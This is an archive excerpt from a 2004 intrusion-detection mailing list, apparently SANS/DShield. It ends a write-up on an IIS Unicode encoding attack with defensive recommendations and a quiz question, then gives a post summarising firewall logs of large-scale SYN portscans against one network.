System countermeasures 2: The problem of the IIS way of encoding non-ASCII characters cannot be resolved solely by patching. So I give 2.

Network countermeasures 2: Firewalls and routers cannot prevent the Unicode attack that well. So I give 2 for this as well. Unless a specific web application firewall is being used; then I would give a higher rating.

Severity = (4 + 2) - (2 + 2) = 2

9. Defensive recommendation

-Apply necessary patches to prevent known vulnerabilities in the web server or operating system.
-Apply secure programming concepts when developing the web application. Necessary input validation must be in place to filter out characters that will not be needed. In most cases, non-ASCII characters won't be needed for any field.
-Have network measures in place such as properly configured routers, firewalls and IDS.

10. Multiple choice questions

Which web server could be vulnerable to a 'bare byte Unicode encoding' attack?
A. IIS
B. Netscape
C. Apache
D. Any web server

Answer: A

_______________________________________________
Intrusions mailing list
Intrusions at lists.sans.org
http://www.dshield.org/mailman/listinfo/intrusions

From Ken.Connelly at uni.edu Mon Jul 12 12:13:31 2004
From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu)
Date: Mon, 12 Jul 2004 07:13:31 -0500 (CDT)
Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects
Message-ID: <01LCD61RVV9W8YDL7A@uni.edu>

The following extracts show the beginning and ending of the scan activity that was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500.
Jul 11 07:47:26 69.157.228.177:62712 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 11 07:47:26 69.157.228.177:62713 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 11 07:47:26 69.157.228.177:62714 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 11 07:47:26 69.157.228.177:62715 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 11 07:47:26 69.157.228.177:62716 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 11 07:47:26 69.157.228.177:62717 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 11 07:47:26 69.157.228.177:62718 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 11 07:47:26 69.157.228.177:62719 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 11 22:32:41 69.157.228.177:61149 -> xxx.yyy.254.247:1433 SYN ******S*
Jul 11 22:32:41 69.157.228.177:61150 -> xxx.yyy.254.248:1433 SYN ******S*
Jul 11 22:32:41 69.157.228.177:61151 -> xxx.yyy.254.249:1433 SYN ******S*
Jul 11 22:32:41 69.157.228.177:61152 -> xxx.yyy.254.250:1433 SYN ******S*
Jul 11 22:32:41 69.157.228.177:61154 -> xxx.yyy.254.251:1433 SYN ******S*
Jul 11 22:32:41 69.157.228.177:61155 -> xxx.yyy.254.252:1433 SYN ******S*
Jul 11 22:32:41 69.157.228.177:61156 -> xxx.yyy.254.253:1433 SYN ******S*
Jul 11 22:32:41 69.157.228.177:61157 -> xxx.yyy.254.254:1433 SYN ******S*
Jul 11 22:32:43 69.157.228.177:60645 -> xxx.yyy.253.97:1433 SYN ******S*
86618

Jul 11 11:19:10 212.51.61.150:62659 -> xxx.yyy.1.1:4000 SYN ******S*
Jul 11 11:19:10 212.51.61.150:62659 -> xxx.yyy.1.2:4000 SYN ******S*
Jul 11 11:19:10 212.51.61.150:62659 -> xxx.yyy.1.3:4000 SYN ******S*
Jul 11 11:19:11 212.51.61.150:62659 -> xxx.yyy.1.4:4000 SYN ******S*
Jul 11 11:19:11 212.51.61.150:62659 -> xxx.yyy.1.5:4000 SYN ******S*
Jul 11 11:19:11 212.51.61.150:62659 -> xxx.yyy.1.6:4000 SYN ******S*
Jul 11 11:19:11 212.51.61.150:62659 -> xxx.yyy.1.7:4000 SYN ******S*
Jul 11 11:19:11 212.51.61.150:62659 -> xxx.yyy.1.8:4000 SYN ******S*
[...]
Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.248:4000 SYN ******S*
Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.245:4000 SYN ******S*
Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.242:4000 SYN ******S*
Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.249:4000 SYN ******S*
Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.253:4000 SYN ******S*
Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.254:4000 SYN ******S*
Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.251:4000 SYN ******S*
Jul 11 11:30:04 212.51.61.150:62664 -> xxx.yyy.255.252:4000 SYN ******S*
73426

Jul 11 21:28:37 64.230.147.239:1460 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 11 21:28:37 64.230.147.239:1461 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 11 21:28:37 64.230.147.239:1462 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 11 21:28:37 64.230.147.239:1463 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 11 21:28:37 64.230.147.239:1464 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 11 21:28:37 64.230.147.239:1465 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 11 21:28:37 64.230.147.239:1466 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 11 21:28:34 64.230.147.239:1467 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 11 21:44:32 64.230.147.239:4350 -> xxx.yyy.255.215:1433 SYN ******S*
Jul 11 21:44:32 64.230.147.239:4351 -> xxx.yyy.255.216:1433 SYN ******S*
Jul 11 21:44:32 64.230.147.239:4352 -> xxx.yyy.255.217:1433 SYN ******S*
Jul 11 21:44:32 64.230.147.239:4356 -> xxx.yyy.255.219:1433 SYN ******S*
Jul 11 21:44:32 64.230.147.239:4357 -> xxx.yyy.255.220:1433 SYN ******S*
Jul 11 21:44:32 64.230.147.239:4358 -> xxx.yyy.255.221:1433 SYN ******S*
Jul 11 21:44:32 64.230.147.239:4359 -> xxx.yyy.255.222:1433 SYN ******S*
Jul 11 21:44:32 64.230.147.239:4360 -> xxx.yyy.255.223:1433 SYN ******S*
71985

Jul 11 02:57:51 211.105.46.18:2300 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 11 02:57:54 211.105.46.18:2299 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 11 02:57:54 211.105.46.18:2302 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 11 02:57:54 211.105.46.18:2301 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 11 02:57:54 211.105.46.18:2303 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 11 02:57:54 211.105.46.18:2304 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 11 02:57:54 211.105.46.18:2305 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 11 02:57:54 211.105.46.18:2306 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 11 03:09:32 211.105.46.18:4008 -> xxx.yyy.255.247:1433 SYN ******S*
Jul 11 03:09:32 211.105.46.18:4009 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 11 03:09:32 211.105.46.18:4005 -> xxx.yyy.255.244:1433 SYN ******S*
Jul 11 03:09:32 211.105.46.18:4007 -> xxx.yyy.255.246:1433 SYN ******S*
Jul 11 03:09:32 211.105.46.18:4004 -> xxx.yyy.255.243:1433 SYN ******S*
Jul 11 03:09:32 211.105.46.18:4010 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 11 03:09:32 211.105.46.18:4013 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 11 03:09:33 211.105.46.18:4015 -> xxx.yyy.255.254:1433 SYN ******S*
Jul 11 03:09:33 211.105.46.18:4014 -> xxx.yyy.255.253:1433 SYN ******S*
71073

Jul 11 14:10:29 211.94.206.41:3402 -> xxx.yyy.1.1:443 SYN ******S*
Jul 11 14:10:29 211.94.206.41:3403 -> xxx.yyy.1.2:443 SYN ******S*
Jul 11 14:10:29 211.94.206.41:3404 -> xxx.yyy.1.3:443 SYN ******S*
Jul 11 14:10:31 211.94.206.41:3405 -> xxx.yyy.1.4:443 SYN ******S*
Jul 11 14:10:31 211.94.206.41:3406 -> xxx.yyy.1.5:443 SYN ******S*
Jul 11 14:10:28 211.94.206.41:3407 -> xxx.yyy.1.6:443 SYN ******S*
Jul 11 14:10:28 211.94.206.41:3408 -> xxx.yyy.1.7:443 SYN ******S*
Jul 11 14:10:31 211.94.206.41:3409 -> xxx.yyy.1.8:443 SYN ******S*
[...]
Jul 11 14:22:09 211.94.206.41:2043 -> xxx.yyy.255.242:443 SYN ******S*
Jul 11 14:22:09 211.94.206.41:2045 -> xxx.yyy.255.244:443 SYN ******S*
Jul 11 14:22:09 211.94.206.41:2055 -> xxx.yyy.255.254:443 SYN ******S*
Jul 11 14:22:09 211.94.206.41:2052 -> xxx.yyy.255.251:443 SYN ******S*
Jul 11 14:22:09 211.94.206.41:2050 -> xxx.yyy.255.249:443 SYN ******S*
Jul 11 14:22:09 211.94.206.41:2054 -> xxx.yyy.255.253:443 SYN ******S*
Jul 11 14:22:09 211.94.206.41:2053 -> xxx.yyy.255.252:443 SYN ******S*
Jul 11 14:22:09 211.94.206.41:2051 -> xxx.yyy.255.250:443 SYN ******S*
70829

Jul 11 23:45:27 216.229.142.202:2527 -> xxx.yyy.1.0:5554 SYN ******S*
Jul 11 23:45:27 216.229.142.202:2528 -> xxx.yyy.1.1:5554 SYN ******S*
Jul 11 23:45:27 216.229.142.202:2529 -> xxx.yyy.1.2:5554 SYN ******S*
Jul 11 23:45:27 216.229.142.202:2530 -> xxx.yyy.1.3:5554 SYN ******S*
Jul 11 23:45:29 216.229.142.202:2531 -> xxx.yyy.1.4:5554 SYN ******S*
Jul 11 23:45:29 216.229.142.202:2532 -> xxx.yyy.1.5:5554 SYN ******S*
Jul 11 23:45:29 216.229.142.202:2533 -> xxx.yyy.1.6:5554 SYN ******S*
Jul 11 23:45:29 216.229.142.202:2534 -> xxx.yyy.1.7:5554 SYN ******S*
[...]
Jul 11 23:48:29 216.229.142.202:3876 -> xxx.yyy.255.235:5554 SYN ******S*
Jul 11 23:48:29 216.229.142.202:3893 -> xxx.yyy.255.251:5554 SYN ******S*
Jul 11 23:48:29 216.229.142.202:3899 -> xxx.yyy.255.254:5554 SYN ******S*
Jul 11 23:48:29 216.229.142.202:3880 -> xxx.yyy.255.239:5554 SYN ******S*
Jul 11 23:48:29 216.229.142.202:3884 -> xxx.yyy.255.242:5554 SYN ******S*
Jul 11 23:48:29 216.229.142.202:3890 -> xxx.yyy.255.248:5554 SYN ******S*
Jul 11 23:48:29 216.229.142.202:3887 -> xxx.yyy.255.245:5554 SYN ******S*
Jul 11 23:48:29 216.229.142.202:3877 -> xxx.yyy.255.236:5554 SYN ******S*
Jul 11 23:48:29 216.229.142.202:3894 -> xxx.yyy.255.252:5554 SYN ******S*
69880

Jul 11 05:19:41 195.16.228.76:1257 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 11 05:19:41 195.16.228.76:1258 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 11 05:19:41 195.16.228.76:1259 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 11 05:19:41 195.16.228.76:1260 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 11 05:19:41 195.16.228.76:1261 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 11 05:19:41 195.16.228.76:1262 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 11 05:19:41 195.16.228.76:1263 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 11 05:19:38 195.16.228.76:1264 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 11 05:31:19 195.16.228.76:3896 -> xxx.yyy.255.239:1433 SYN ******S*
Jul 11 05:31:19 195.16.228.76:3897 -> xxx.yyy.255.240:1433 SYN ******S*
Jul 11 05:31:19 195.16.228.76:3898 -> xxx.yyy.255.241:1433 SYN ******S*
Jul 11 05:31:19 195.16.228.76:3906 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 11 05:31:19 195.16.228.76:3905 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 11 05:31:19 195.16.228.76:3907 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 11 05:31:19 195.16.228.76:3902 -> xxx.yyy.255.245:1433 SYN ******S*
Jul 11 05:31:19 195.16.228.76:3903 -> xxx.yyy.255.246:1433 SYN ******S*
Jul 11 05:31:19 195.16.228.76:3904 -> xxx.yyy.255.247:1433 SYN ******S*
69527

Jul 11 05:15:43 199.35.73.80:3170 -> xxx.yyy.1.1:4000 SYN ******S*
Jul 11 05:15:43 199.35.73.80:3171 -> xxx.yyy.1.2:4000 SYN ******S*
Jul 11 05:15:43 199.35.73.80:3172 -> xxx.yyy.1.3:4000 SYN ******S*
Jul 11 05:15:45 199.35.73.80:3173 -> xxx.yyy.1.4:4000 SYN ******S*
Jul 11 05:15:45 199.35.73.80:3174 -> xxx.yyy.1.5:4000 SYN ******S*
Jul 11 05:15:45 199.35.73.80:3175 -> xxx.yyy.1.6:4000 SYN ******S*
Jul 11 05:15:45 199.35.73.80:3176 -> xxx.yyy.1.7:4000 SYN ******S*
Jul 11 05:15:45 199.35.73.80:3177 -> xxx.yyy.1.8:4000 SYN ******S*
[...]
Jul 11 05:24:20 199.35.73.80:1760 -> xxx.yyy.197.107:4000 SYN ******S*
Jul 11 05:24:20 199.35.73.80:1764 -> xxx.yyy.197.111:4000 SYN ******S*
Jul 11 05:24:20 199.35.73.80:1765 -> xxx.yyy.197.112:4000 SYN ******S*
Jul 11 05:24:20 199.35.73.80:1762 -> xxx.yyy.197.109:4000 SYN ******S*
Jul 11 05:24:20 199.35.73.80:1766 -> xxx.yyy.197.113:4000 SYN ******S*
Jul 11 05:24:20 199.35.73.80:1767 -> xxx.yyy.197.114:4000 SYN ******S*
Jul 11 05:24:20 199.35.73.80:1768 -> xxx.yyy.197.115:4000 SYN ******S*
Jul 11 05:24:20 199.35.73.80:1769 -> xxx.yyy.197.116:4000 SYN ******S*
49519

Jul 11 05:07:35 216.177.242.60:1296 -> xxx.yyy.1.2:8000 SYN ******S*
Jul 11 05:07:35 216.177.242.60:1298 -> xxx.yyy.1.1:8000 SYN ******S*
Jul 11 05:07:35 216.177.242.60:1299 -> xxx.yyy.1.3:8000 SYN ******S*
Jul 11 05:07:35 216.177.242.60:1300 -> xxx.yyy.1.5:8000 SYN ******S*
Jul 11 05:07:35 216.177.242.60:1303 -> xxx.yyy.1.9:8000 SYN ******S*
Jul 11 05:07:35 216.177.242.60:1304 -> xxx.yyy.1.8:8000 SYN ******S*
Jul 11 05:07:35 216.177.242.60:1301 -> xxx.yyy.1.4:8000 SYN ******S*
Jul 11 05:07:35 216.177.242.60:1302 -> xxx.yyy.1.7:8000 SYN ******S*
[...]
Jul 11 05:12:47 216.177.242.60:4008 -> xxx.yyy.255.247:8000 SYN ******S*
Jul 11 05:12:47 216.177.242.60:4009 -> xxx.yyy.255.248:8000 SYN ******S*
Jul 11 05:12:47 216.177.242.60:4010 -> xxx.yyy.255.250:8000 SYN ******S*
Jul 11 05:12:47 216.177.242.60:4011 -> xxx.yyy.255.249:8000 SYN ******S*
Jul 11 05:12:47 216.177.242.60:4013 -> xxx.yyy.255.252:8000 SYN ******S*
Jul 11 05:12:47 216.177.242.60:4014 -> xxx.yyy.255.253:8000 SYN ******S*
Jul 11 05:12:47 216.177.242.60:4012 -> xxx.yyy.255.251:8000 SYN ******S*
Jul 11 05:12:47 216.177.242.60:4015 -> xxx.yyy.255.254:8000 SYN ******S*
43786

Jul 11 02:42:20 65.89.43.60:1486 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 11 02:42:20 65.89.43.60:1487 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 11 02:42:20 65.89.43.60:1488 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 11 02:42:19 65.89.43.60:1489 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 11 02:42:19 65.89.43.60:1490 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 11 02:42:19 65.89.43.60:1491 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 11 02:42:19 65.89.43.60:1492 -> xxx.yyy.1.7:4899 SYN ******S*
Jul 11 02:42:19 65.89.43.60:1493 -> xxx.yyy.1.8:4899 SYN ******S*
[...]
Jul 11 02:46:57 65.89.43.60:3415 -> xxx.yyy.255.246:4899 SYN ******S*
Jul 11 02:46:57 65.89.43.60:3416 -> xxx.yyy.255.247:4899 SYN ******S*
Jul 11 02:46:57 65.89.43.60:3417 -> xxx.yyy.255.248:4899 SYN ******S*
Jul 11 02:46:57 65.89.43.60:3418 -> xxx.yyy.255.249:4899 SYN ******S*
Jul 11 02:46:57 65.89.43.60:3419 -> xxx.yyy.255.250:4899 SYN ******S*
Jul 11 02:46:57 65.89.43.60:3420 -> xxx.yyy.255.251:4899 SYN ******S*
Jul 11 02:46:57 65.89.43.60:3421 -> xxx.yyy.255.252:4899 SYN ******S*
Jul 11 02:46:57 65.89.43.60:3422 -> xxx.yyy.255.253:4899 SYN ******S*
Jul 11 02:46:57 65.89.43.60:3423 -> xxx.yyy.255.254:4899 SYN ******S*
43511

Jul 11 03:15:57 168.115.112.134:2152 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 11 03:15:57 168.115.112.134:2153 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 11 03:15:57 168.115.112.134:2154 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 11 03:16:00 168.115.112.134:2155 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 11 03:16:00 168.115.112.134:2156 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 11 03:16:00 168.115.112.134:2157 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 11 03:16:00 168.115.112.134:2158 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 11 03:16:00 168.115.112.134:2159 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 11 03:23:07 168.115.112.134:1320 -> xxx.yyy.156.175:1433 SYN ******S*
Jul 11 03:23:07 168.115.112.134:1317 -> xxx.yyy.156.172:1433 SYN ******S*
Jul 11 03:23:07 168.115.112.134:1321 -> xxx.yyy.156.176:1433 SYN ******S*
Jul 11 03:23:07 168.115.112.134:1318 -> xxx.yyy.156.173:1433 SYN ******S*
Jul 11 03:23:07 168.115.112.134:1315 -> xxx.yyy.156.170:1433 SYN ******S*
Jul 11 03:23:07 168.115.112.134:1322 -> xxx.yyy.156.177:1433 SYN ******S*
Jul 11 03:23:07 168.115.112.134:1319 -> xxx.yyy.156.174:1433 SYN ******S*
Jul 11 03:23:07 168.115.112.134:1316 -> xxx.yyy.156.171:1433 SYN ******S*
Jul 11 03:23:07 168.115.112.134:1596 -> xxx.yyy.157.194:1433 SYN ******S*
31274

Jul 11 16:52:47 82.37.26.119:2591 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 11 16:52:44 82.37.26.119:2593 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 11 16:52:44 82.37.26.119:2594 -> xxx.yyy.1.0:1433 SYN ******S*
Jul 11 16:52:47 82.37.26.119:2589 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 11 16:52:47 82.37.26.119:2590 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 11 16:52:47 82.37.26.119:2592 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 11 16:52:44 82.37.26.119:2609 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 11 16:52:44 82.37.26.119:2611 -> xxx.yyy.1.7:1433 SYN ******S*
[...]
Jul 11 18:17:21 82.37.26.119:3610 -> xxx.yyy.95.64:1433 SYN ******S*
Jul 11 18:17:21 82.37.26.119:3611 -> xxx.yyy.95.65:1433 SYN ******S*
Jul 11 18:17:22 82.37.26.119:3612 -> xxx.yyy.95.66:1433 SYN ******S*
Jul 11 18:17:22 82.37.26.119:3613 -> xxx.yyy.95.67:1433 SYN ******S*
Jul 11 18:17:22 82.37.26.119:3614 -> xxx.yyy.95.68:1433 SYN ******S*
Jul 11 18:17:22 82.37.26.119:3615 -> xxx.yyy.95.69:1433 SYN ******S*
Jul 11 18:17:22 82.37.26.119:3616 -> xxx.yyy.95.70:1433 SYN ******S*
Jul 11 18:17:22 82.37.26.119:3617 -> xxx.yyy.95.71:1433 SYN ******S*
Jul 11 18:17:22 82.37.26.119:3620 -> xxx.yyy.95.72:1433 SYN ******S*
29828

Jul 11 13:19:51 217.26.10.66:2328 -> xxx.yyy.1.21:22 SYN ******S*
Jul 11 13:19:54 217.26.10.66:2329 -> xxx.yyy.1.22:22 SYN ******S*
Jul 11 13:19:51 217.26.10.66:2175 -> xxx.yyy.1.23:22 SYN ******S*
Jul 11 13:19:51 217.26.10.66:2176 -> xxx.yyy.1.24:22 SYN ******S*
Jul 11 13:19:51 217.26.10.66:2178 -> xxx.yyy.1.26:22 SYN ******S*
Jul 11 13:19:51 217.26.10.66:2179 -> xxx.yyy.1.27:22 SYN ******S*
Jul 11 13:19:51 217.26.10.66:2211 -> xxx.yyy.1.59:22 SYN ******S*
Jul 11 13:19:54 217.26.10.66:2330 -> xxx.yyy.1.25:22 SYN ******S*
[...]
Jul 11 13:28:43 217.26.10.66:3666 -> xxx.yyy.255.175:22 SYN ******S*
Jul 11 13:28:43 217.26.10.66:3667 -> xxx.yyy.255.176:22 SYN ******S*
Jul 11 13:28:43 217.26.10.66:3668 -> xxx.yyy.255.177:22 SYN ******S*
Jul 11 13:28:43 217.26.10.66:3669 -> xxx.yyy.255.178:22 SYN ******S*
Jul 11 13:28:43 217.26.10.66:3670 -> xxx.yyy.255.179:22 SYN ******S*
Jul 11 13:28:43 217.26.10.66:3671 -> xxx.yyy.255.180:22 SYN ******S*
Jul 11 13:28:43 217.26.10.66:3672 -> xxx.yyy.255.181:22 SYN ******S*
Jul 11 13:28:43 217.26.10.66:3673 -> xxx.yyy.255.182:22 SYN ******S*
19566

Jul 11 18:48:49 221.154.71.56:3230 -> xxx.yyy.174.223:5554 SYN ******S*
Jul 11 18:48:50 221.154.71.56:3770 -> xxx.yyy.174.223:1023 SYN ******S*
Jul 11 18:48:52 221.154.71.56:1145 -> xxx.yyy.174.223:9898 SYN ******S*
Jul 11 18:48:49 221.154.71.56:3233 -> xxx.yyy.174.226:5554 SYN ******S*
Jul 11 18:48:50 221.154.71.56:3793 -> xxx.yyy.174.226:1023 SYN ******S*
Jul 11 18:48:52 221.154.71.56:1212 -> xxx.yyy.174.226:9898 SYN ******S*
Jul 11 18:48:49 221.154.71.56:3241 -> xxx.yyy.174.233:5554 SYN ******S*
Jul 11 18:48:50 221.154.71.56:3779 -> xxx.yyy.174.233:1023 SYN ******S*
[...]
Jul 11 18:49:38 221.154.71.56:1595 -> xxx.yyy.195.81:9898 SYN ******S*
Jul 11 18:49:38 221.154.71.56:1598 -> xxx.yyy.195.84:9898 SYN ******S*
Jul 11 18:49:38 221.154.71.56:1589 -> xxx.yyy.195.74:9898 SYN ******S*
Jul 11 18:49:38 221.154.71.56:1613 -> xxx.yyy.195.86:9898 SYN ******S*
Jul 11 18:49:38 221.154.71.56:1596 -> xxx.yyy.195.82:9898 SYN ******S*
Jul 11 18:49:38 221.154.71.56:1597 -> xxx.yyy.195.83:9898 SYN ******S*
Jul 11 18:49:38 221.154.71.56:1615 -> xxx.yyy.195.88:9898 SYN ******S*
Jul 11 18:49:38 221.154.71.56:1623 -> xxx.yyy.195.79:9898 SYN ******S*
Jul 11 18:49:38 221.154.71.56:1614 -> xxx.yyy.195.87:9898 SYN ******S*
15109

Jul 11 23:56:48 222.100.36.37:2723 -> xxx.yyy.236.80:5554 SYN ******S*
Jul 11 23:56:49 222.100.36.37:3316 -> xxx.yyy.236.80:1023 SYN ******S*
Jul 11 23:56:50 222.100.36.37:1216 -> xxx.yyy.236.80:9898 SYN ******S*
Jul 11 23:56:48 222.100.36.37:2727 -> xxx.yyy.236.84:5554 SYN ******S*
Jul 11 23:56:49 222.100.36.37:3320 -> xxx.yyy.236.84:1023 SYN ******S*
Jul 11 23:56:50 222.100.36.37:1220 -> xxx.yyy.236.84:9898 SYN ******S*
Jul 11 23:56:47 222.100.36.37:2734 -> xxx.yyy.236.91:5554 SYN ******S*
Jul 11 23:56:48 222.100.36.37:3327 -> xxx.yyy.236.91:1023 SYN ******S*
[...]
Jul 11 23:57:29 222.100.36.37:3274 -> xxx.yyy.255.254:9898 SYN ******S*
Jul 11 23:57:28 222.100.36.37:2418 -> xxx.yyy.255.213:9898 SYN ******S*
Jul 11 23:57:28 222.100.36.37:2443 -> xxx.yyy.255.214:9898 SYN ******S*
Jul 11 23:57:28 222.100.36.37:2639 -> xxx.yyy.255.215:9898 SYN ******S*
Jul 11 23:57:28 222.100.36.37:2894 -> xxx.yyy.255.220:9898 SYN ******S*
Jul 11 23:57:29 222.100.36.37:2892 -> xxx.yyy.255.218:9898 SYN ******S*
Jul 11 23:57:29 222.100.36.37:2897 -> xxx.yyy.255.223:9898 SYN ******S*
Jul 11 23:57:29 222.100.36.37:2899 -> xxx.yyy.255.225:9898 SYN ******S*
Jul 11 23:57:29 222.100.36.37:2919 -> xxx.yyy.255.238:9898 SYN ******S*
13877

Jul 11 00:57:18 221.216.146.118:4909 -> xxx.yyy.154.100:5554 SYN ******S*
Jul 11 00:57:21 221.216.146.118:2239 -> xxx.yyy.154.100:9898 SYN ******S*
Jul 11 00:57:18 221.216.146.118:4919 -> xxx.yyy.154.101:5554 SYN ******S*
Jul 11 00:57:20 221.216.146.118:1473 -> xxx.yyy.154.101:1023 SYN ******S*
Jul 11 00:57:18 221.216.146.118:4920 -> xxx.yyy.154.103:5554 SYN ******S*
Jul 11 00:57:18 221.216.146.118:4922 -> xxx.yyy.154.111:5554 SYN ******S*
Jul 11 00:57:18 221.216.146.118:4923 -> xxx.yyy.154.112:5554 SYN ******S*
Jul 11 00:57:18 221.216.146.118:4924 -> xxx.yyy.154.113:5554 SYN ******S*
[...]
Jul 11 00:58:14 221.216.146.118:1307 -> xxx.yyy.154.218:9898 SYN ******S*
Jul 11 00:58:14 221.216.146.118:1308 -> xxx.yyy.154.226:9898 SYN ******S*
Jul 11 00:58:14 221.216.146.118:1320 -> xxx.yyy.154.230:9898 SYN ******S*
Jul 11 00:58:14 221.216.146.118:1325 -> xxx.yyy.154.229:9898 SYN ******S*
Jul 11 00:58:14 221.216.146.118:1327 -> xxx.yyy.154.233:9898 SYN ******S*
Jul 11 00:58:14 221.216.146.118:1329 -> xxx.yyy.154.231:9898 SYN ******S*
Jul 11 00:58:14 221.216.146.118:1330 -> xxx.yyy.154.234:9898 SYN ******S*
Jul 11 00:58:14 221.216.146.118:1331 -> xxx.yyy.154.232:9898 SYN ******S*
Jul 11 00:58:14 221.216.146.118:1335 -> xxx.yyy.154.235:9898 SYN ******S*
13211

Jul 11 07:41:53 211.55.14.186:22002 -> xxx.yyy.1.0:1080 SYN ******S*
Jul 11 07:41:53 211.55.14.186:22002 -> xxx.yyy.1.0:10080 SYN ******S*
Jul 11 07:41:53 211.55.14.186:22002 -> xxx.yyy.1.0:3128 SYN ******S*
Jul 11 07:41:53 211.55.14.186:22002 -> xxx.yyy.1.1:1080 SYN ******S*
Jul 11 07:41:53 211.55.14.186:22002 -> xxx.yyy.1.1:10080 SYN ******S*
Jul 11 07:41:53 211.55.14.186:22002 -> xxx.yyy.1.1:3128 SYN ******S*
Jul 11 07:41:54 211.55.14.186:22002 -> xxx.yyy.1.2:1080 SYN ******S*
Jul 11 07:41:54 211.55.14.186:22002 -> xxx.yyy.1.2:10080 SYN ******S*
[...]
Jul 11 09:49:55 211.55.14.186:22002 -> xxx.yyy.67.232:1080 SYN ******S*
Jul 11 09:49:55 211.55.14.186:22002 -> xxx.yyy.67.232:10080 SYN ******S*
Jul 11 09:49:55 211.55.14.186:22002 -> xxx.yyy.67.232:3128 SYN ******S*
Jul 11 09:49:56 211.55.14.186:22002 -> xxx.yyy.67.233:1080 SYN ******S*
Jul 11 09:49:56 211.55.14.186:22002 -> xxx.yyy.67.233:10080 SYN ******S*
Jul 11 09:49:56 211.55.14.186:22002 -> xxx.yyy.67.233:3128 SYN ******S*
Jul 11 09:49:56 211.55.14.186:22002 -> xxx.yyy.67.234:1080 SYN ******S*
Jul 11 09:49:56 211.55.14.186:22002 -> xxx.yyy.67.234:10080 SYN ******S*
12101

Jul 11 08:00:14 219.35.68.196:22002 -> xxx.yyy.1.0:3127 SYN ******S*
Jul 11 08:00:14 219.35.68.196:22002 -> xxx.yyy.1.0:1080 SYN ******S*
Jul 11 08:00:15 219.35.68.196:22002 -> xxx.yyy.1.0:10080 SYN ******S*
Jul 11 08:00:15 219.35.68.196:22002 -> xxx.yyy.1.0:3128 SYN ******S*
Jul 11 08:00:15 219.35.68.196:22002 -> xxx.yyy.1.1:1080 SYN ******S*
Jul 11 08:00:15 219.35.68.196:22002 -> xxx.yyy.1.1:10080 SYN ******S*
Jul 11 08:00:15 219.35.68.196:22002 -> xxx.yyy.1.1:3128 SYN ******S*
Jul 11 08:00:15 219.35.68.196:22002 -> xxx.yyy.1.2:3127 SYN ******S*
[...]
Jul 11 08:55:53 219.35.68.196:22002 -> xxx.yyy.32.254:3127 SYN ******S*
Jul 11 08:55:53 219.35.68.196:22002 -> xxx.yyy.32.254:1080 SYN ******S*
Jul 11 08:55:53 219.35.68.196:22002 -> xxx.yyy.32.254:10080 SYN ******S*
Jul 11 08:55:53 219.35.68.196:22002 -> xxx.yyy.32.254:3128 SYN ******S*
Jul 11 08:55:53 219.35.68.196:22002 -> xxx.yyy.32.255:3127 SYN ******S*
Jul 11 08:55:54 219.35.68.196:22002 -> xxx.yyy.32.255:1080 SYN ******S*
Jul 11 08:55:54 219.35.68.196:22002 -> xxx.yyy.32.255:10080 SYN ******S*
